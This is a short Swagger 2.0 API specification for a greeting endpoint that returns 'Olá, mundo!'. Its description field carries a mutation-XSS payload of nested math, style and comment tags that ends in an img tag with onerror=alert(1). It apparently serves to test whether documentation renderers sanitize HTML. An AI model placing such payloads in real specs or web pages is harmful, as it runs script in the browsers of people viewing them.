swagger: '2.0'
info:
  title: Login page
  description: |
    <math><foo-test><mi><li><table><foo-test><li></li></foo-test>a<a><style><!--</style>a<foo-bar is="--><img src=x onerror=alert(1)>">
  version: 1.0.0
paths:
  /saudacao:
    get:
      summary: Retorna uma mensagem de boas-vindas.
      produces:
        - application/json
      responses:
        '200':
          description: Sucesso
          schema:
            type: object
            properties:
              mensagem:
                type: string
                example: "Olá, mundo!"